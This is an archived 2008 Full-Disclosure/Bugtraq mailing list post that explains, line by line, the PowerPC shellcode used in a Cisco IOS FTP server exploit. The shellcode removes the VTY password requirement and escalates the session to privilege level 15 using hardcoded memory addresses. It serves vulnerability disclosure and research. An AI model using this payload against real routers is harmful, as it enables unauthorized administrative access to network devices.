| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <ef91d9cd0807300203kca349av303317449b58c0fa@mail.gmail.com>
Date: Wed, 30 Jul 2008 10:03:51 +0100
From: "Andy Davis" <iosftpexploit@...glemail.com>
To: bugtraq@...urityfocus.com, full-disclosure@...ts.grok.org.uk
Subject: Cisco IOS shellcode explanation
Hi,
Lots of people have been asking for details about the slightly
unorthodox shellcode I used within the IOS FTP exploit, so here goes:
.equ vty_info, 0x8182da60 //contains a pointer to the VTY info structure
.equ terminate, 0x80e4086c
lis 4,vty_info@ha
la 4,vty_info@l(4)
xor 8,8,8 //Clear r8
lwzx 7,4,8 //Get pointer to VTY info structure
stw 8,372(7) //Write zero to first offset to remove
//the requirement to enter a password
subi 8,8,1 //Set r8 to be 0xffffffff
addi 7,7,233 //Add second offset in two steps to
//avoid nulls in the shellcode
stw 8,1226(7) //Write 0xffffffff to second offset to
//priv escalate to level 15
//(technically this should be 0xff100000
//but 0xffffffff works and is more efficient)
mr 3,8 //Use 0xffffffff as a parameter
//to pass to terminate()
lis 4,terminate@ha
la 4,terminate@l(4)
mtctr 4
bctr //terminate "this process"
//(current connection to the FTP server)
Cheers,
Andy
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists